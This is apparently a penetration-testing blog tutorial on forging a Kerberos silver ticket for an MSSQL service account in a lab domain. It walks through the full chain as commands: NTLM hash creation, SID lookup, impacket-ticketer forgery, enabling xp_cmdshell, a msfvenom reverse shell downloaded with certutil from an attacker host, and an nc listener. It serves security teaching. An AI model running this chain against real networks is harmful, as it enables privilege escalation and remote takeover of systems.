To make it simple: Silver tickets are forged Service tickets. Service tickets are tickets that allow users to access services. By services I mean LDAP, HTTP, WSMAN, MSSQL, etc. To forge a silver ticket, we need the hash of the Service account and . . . that’s it. With this “silver ticket” we can potentially pivot to other machines in the Domain.
Well if we have the hash, why not just log in with the password or try pass-the-hash and be on our way? The reason for that is because if the Service account changes its password, the hash will also change. But the ticket will still be valid.
There are also other reasons why we might want to use Silver Tickets. Lets take MSSQLSvc into example: SQL Server has security measures to prevent unauthorized machines from logging in, but if we use a ticket, we’ll be able to bypass the Integrated authentication process. In this post, I’ll be showing you how we can create a silver ticket for the MSSQLSvc service.
Demo
Before we start, we need to configure our /etc/hosts file on Kali. The reason we do this is because a lot of remote pentesting tools like to use Domain names instead of IPs.
After that, we need to obtain the required information (NTLM hash of MSSQLSvc and Domain SID). There are multiple ways to get the Service Account hash remotely. A common way is via Kerberoasting and lucky for you, I’ve written a blog about it!
Through kerberoasting, we’ll have a clear text password. We can convert it to an NTLM hash using the command below:
iconv -f ASCII -t UTF-16LE <(printf "CJ&Eric") | openssl dgst -md4
“CJ&Eric” is the clear-text password
Now to get the Domain SID we can use a tool called lookupsid. Similar with kerberoasting remotely, we need a Domain User’s credentials to get the SID. For this scenario, lets assume that we have the password for the J.Williams user.
impacket-lookupsid <Domain_Name>/<username_of_user>@<DC_IP>
After we have the required information, we can use Ticketer to create the ticket.
impacket-ticketer -nthash <NTLM_Hash_Service> -domain-sid <Domain_SID> -domain <Domain_Name> -spn MSSQLSvc/<Full_Computer_Name> Administrator
Then, we need to export that ticket to the KRB5CCNAME environment variable.
export KRB5CCNAME=/home/activepwn/Administrator.ccache
Now, we can use mssqlclient.py to log into the SQL Server.
mssqlclient.py CLIENT1.WANDA.local -k
I’ll also show you how we can get a shell from mssqlclient.
We can enable xp_cmdshell and execute commands on the Windows machine.
enable_xp_cmdshell
xp_cmdshell "whoami"
Note: You need Administrator privileges to execute “enable_xp_cmdshell”. We have Administrator privileges because of the silver ticket.
We can use xp_cmdshell to copy a reverse shell over and execute it. First lets create the reverse shell.
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.5.7 LPORT=53 --platform Windows -f exe > reverse.exe
Now lets use certutil.exe to download it.
xp_cmdshell "certutil.exe -urlcache -f http://<Kali_IP>/reverse.exe C:\Windows\Temp\reverse.exe"
Before we execute it, lets set up a netcat listener.
nc -lnvp 53
Execute it!
xp_cmdshell "C:\Windows\Temp\reverse.exe"
Back on our netcat listener, we get a shell! When we check who we’re running as, we can see that its ms-sql but we have the privileges of an Administrator.
This is just one example of how we can use a silver ticket. If you want more examples, check this out: Silver Tickets
